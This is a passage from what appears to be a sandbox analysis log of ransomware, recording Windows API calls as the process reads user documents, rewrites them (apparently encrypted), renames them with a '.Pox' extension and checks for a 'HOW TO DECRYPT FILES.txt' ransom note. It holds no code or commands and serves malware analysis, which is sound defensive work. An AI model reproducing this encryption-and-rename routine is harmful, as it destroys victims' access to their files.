1 [0039.171] CloseHandle (hObject=0x26c) returned 1 [0039.216] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.217] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.217] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv", lpFilePart=0x0) returned 0x34 [0039.217] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.217] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ozlfj3nx.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.218] GetFileType (hFile=0x26c) returned 0x1 [0039.218] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.218] GetFileType (hFile=0x26c) returned 0x1 [0039.218] WriteFile (in: hFile=0x26c, lpBuffer=0x2428c64*, nNumberOfBytesToWrite=0x6c70, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x2428c64*, lpNumberOfBytesWritten=0x3ae564*=0x6c70, lpOverlapped=0x0) returned 1 [0039.219] CloseHandle (hObject=0x26c) returned 1 [0039.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv", lpFilePart=0x0) returned 0x34 [0039.220] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv.Pox", lpFilePart=0x0) returned 0x38 [0039.220] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.220] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ozlfj3nx.csv"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x645e88d0, ftCreationTime.dwHighDateTime=0x1d4cb56, ftLastAccessTime.dwLowDateTime=0xf8369ef0, ftLastAccessTime.dwHighDateTime=0x1d4cb6d, ftLastWriteTime.dwLowDateTime=0x298e90a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x6c70)) returned 1 [0039.220] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.220] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ozlfj3nx.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\OZlfj3nx.csv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ozlfj3nx.csv.pox")) returned 1 [0039.221] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx", lpFilePart=0x0) returned 0x33 [0039.221] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.221] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rrry7k.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.221] GetFileType (hFile=0x26c) returned 0x1 [0039.221] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.221] GetFileType (hFile=0x26c) returned 0x1 [0039.221] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x15f55 [0039.221] ReadFile (in: hFile=0x26c, lpBuffer=0x3680d10, nNumberOfBytesToRead=0x15f55, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x3680d10*, lpNumberOfBytesRead=0x3ae570*=0x15f55, lpOverlapped=0x0) returned 1 [0039.223] CloseHandle (hObject=0x26c) returned 1 [0039.251] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.251] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.251] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.251] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx", lpFilePart=0x0) returned 0x33 [0039.251] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rrry7k.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.252] GetFileType (hFile=0x26c) returned 0x1 [0039.252] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.252] GetFileType (hFile=0x26c) returned 0x1 [0039.252] WriteFile (in: hFile=0x26c, lpBuffer=0x33e1a50*, nNumberOfBytesToWrite=0x15f60, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x33e1a50*, lpNumberOfBytesWritten=0x3ae564*=0x15f60, lpOverlapped=0x0) returned 1 [0039.255] CloseHandle (hObject=0x26c) returned 1 [0039.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx", lpFilePart=0x0) returned 0x33 [0039.256] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx.Pox", lpFilePart=0x0) returned 0x37 [0039.256] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.256] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rrry7k.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fa1ee40, ftCreationTime.dwHighDateTime=0x1d5373c, ftLastAccessTime.dwLowDateTime=0x228c34c0, ftLastAccessTime.dwHighDateTime=0x1d51764, ftLastWriteTime.dwLowDateTime=0x2995b4c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x15f60)) returned 1 [0039.256] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.256] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rrry7k.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rRrY7K.xlsx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rrry7k.xlsx.pox")) returned 1 [0039.257] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx", lpFilePart=0x0) returned 0x31 [0039.257] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.257] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tkkd.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.257] GetFileType (hFile=0x26c) returned 0x1 [0039.257] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.257] GetFileType (hFile=0x26c) returned 0x1 [0039.257] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0xcad7 [0039.257] ReadFile (in: hFile=0x26c, lpBuffer=0x247d100, nNumberOfBytesToRead=0xcad7, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x247d100*, lpNumberOfBytesRead=0x3ae570*=0xcad7, lpOverlapped=0x0) returned 1 [0039.258] CloseHandle (hObject=0x26c) returned 1 [0039.310] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.311] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.311] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx", lpFilePart=0x0) returned 0x31 [0039.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tkkd.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.315] GetFileType (hFile=0x26c) returned 0x1 [0039.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.315] GetFileType (hFile=0x26c) returned 0x1 [0039.315] WriteFile (in: hFile=0x26c, lpBuffer=0x24effa0*, nNumberOfBytesToWrite=0xcae0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x24effa0*, lpNumberOfBytesWritten=0x3ae564*=0xcae0, lpOverlapped=0x0) returned 1 [0039.317] CloseHandle (hObject=0x26c) returned 1 [0039.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx", lpFilePart=0x0) returned 0x31 [0039.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx.Pox", lpFilePart=0x0) returned 0x35 [0039.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.318] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tkkd.docx"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecbace60, ftCreationTime.dwHighDateTime=0x1d4bddb, ftLastAccessTime.dwLowDateTime=0x84b3d660, ftLastAccessTime.dwHighDateTime=0x1d4d9ea, ftLastWriteTime.dwLowDateTime=0x299f3a40, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xcae0)) returned 1 [0039.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.318] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tkkd.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\tKkd.docx.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\tkkd.docx.pox")) returned 1 [0039.319] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv", lpFilePart=0x0) returned 0x3d [0039.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.319] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wwhgolhk8tzopvmq1.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.319] GetFileType (hFile=0x26c) returned 0x1 [0039.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.319] GetFileType (hFile=0x26c) returned 0x1 [0039.319] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x23b3 [0039.319] ReadFile (in: hFile=0x26c, lpBuffer=0x24fcfc0, nNumberOfBytesToRead=0x23b3, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x24fcfc0*, lpNumberOfBytesRead=0x3ae570*=0x23b3, lpOverlapped=0x0) returned 1 [0039.320] CloseHandle (hObject=0x26c) returned 1 [0039.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.340] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv", lpFilePart=0x0) returned 0x3d [0039.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.340] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wwhgolhk8tzopvmq1.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.341] GetFileType (hFile=0x26c) returned 0x1 [0039.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.341] GetFileType (hFile=0x26c) returned 0x1 [0039.341] WriteFile (in: hFile=0x26c, lpBuffer=0x255506c*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x255506c*, lpNumberOfBytesWritten=0x3ae564*=0x23c0, lpOverlapped=0x0) returned 1 [0039.342] CloseHandle (hObject=0x26c) returned 1 [0039.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv", lpFilePart=0x0) returned 0x3d [0039.343] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv.Pox", lpFilePart=0x0) returned 0x41 [0039.343] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.343] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wwhgolhk8tzopvmq1.csv"), fInfoLevelId=0x0, lpFileInformation=0x3ae5c4 | out: lpFileInformation=0x3ae5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x417488a0, ftCreationTime.dwHighDateTime=0x1d4c670, ftLastAccessTime.dwLowDateTime=0x4a946b10, ftLastAccessTime.dwHighDateTime=0x1d4d5b3, ftLastWriteTime.dwLowDateTime=0x29a19ba0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x23c0)) returned 1 [0039.343] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae544) returned 1 [0039.343] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wwhgolhk8tzopvmq1.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WWhGoLhk8TzOpVmq1.csv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\wwhgolhk8tzopvmq1.csv.pox")) returned 1 [0039.344] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx", nBufferLength=0x105, lpBuffer=0x3adfc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx", lpFilePart=0x0) returned 0x3d [0039.344] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0039.344] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y0f8w8ps2finld97.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.344] GetFileType (hFile=0x26c) returned 0x1 [0039.344] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4b8) returned 1 [0039.344] GetFileType (hFile=0x26c) returned 0x1 [0039.344] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae5c4 | out: lpFileSizeHigh=0x3ae5c4*=0x0) returned 0x11ce8 [0039.344] ReadFile (in: hFile=0x26c, lpBuffer=0x25579cc, nNumberOfBytesToRead=0x11ce8, lpNumberOfBytesRead=0x3ae570, lpOverlapped=0x0 | out: lpBuffer=0x25579cc*, lpNumberOfBytesRead=0x3ae570*=0x11ce8, lpOverlapped=0x0) returned 1 [0039.345] CloseHandle (hObject=0x26c) returned 1 [0039.364] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae0dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0039.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae53c) returned 1 [0039.364] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae5b8 | out: lpFileInformation=0x3ae5b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0039.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae538) returned 1 [0039.364] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx", nBufferLength=0x105, lpBuffer=0x3adfb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx", lpFilePart=0x0) returned 0x3d [0039.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4a8) returned 1 [0039.364] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\y0f8w8ps2finld97.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0039.365] GetFileType (hFile=0x26c) returned 0x1 [0039.365] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4a4) returned 1 [0039.365] GetFileType (hFile=0x26c) returned 0x1 [0039.366] WriteFile (in: hFile=0x26c, lpBuffer=0x23efa74*, nNumberOfBytesToWrite=0x11cf0, lpNumberOfBytesWritten=0x3ae564, lpOverlapped=0x0 | out: lpBuffer=0x23efa74*, lpNumberOfBytesWritten=0x3ae564*=0x11cf0, lpOverlapped=0x0) returned 1 [0039.367] CloseHandle (hObject=0x26c) returned 1 [0039.368] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx", lpFilePart=0x0) returned 0x3d [0039.368] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx.Pox", nBufferLength=0x105, lpBuffer=0x3ae0e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx.Pox", lpFilePart=0x0) returned 0x41 [0039.368] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae548) returned 1 [0039.369] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Y0f8W8Ps2fInLd97.pptx" (normalized: "c:\\users\\5p5nrgjn0js 